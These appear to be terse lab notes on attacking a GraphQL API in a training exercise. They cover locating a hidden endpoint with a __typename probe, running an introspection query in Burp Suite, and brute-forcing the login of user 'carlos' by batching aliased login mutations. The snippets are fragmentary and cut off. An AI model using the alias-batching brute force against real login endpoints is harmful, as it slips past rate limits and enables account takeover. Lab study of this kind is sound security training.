To identify if there is hidden GraphQL API endpoint send an invalid GET request endpoint and observe message Not Found, but when sending /api the response is Query not present.
Enumeration of the GraphQL API endpoint require testing with a universal query.
Modify GET request with query as a URL parameter /api?query=query{__typename}.
The below response validate the identity of GraphQL endpoint:
"data": {
"__typename": "query"
Send a new request with a URL-encoded introspection query as a query parameter.
To do this, right-click the request and select GraphQL > Set introspection query:
This introspection query works with most GraphQL servers. However, if you are working with an older GraphQL server, it may fail. If that happens, right-click anywhere within the Request panel of the message editor, then select GraphQL > Set legacy introspection query and try again.
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
directives {
args {
Right-click anywhere within the Response panel of the message editor, then select GraphQL > Save GraphQL queries to site map.
Brute force login
put thos mutations inside post request inside mutations{}
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");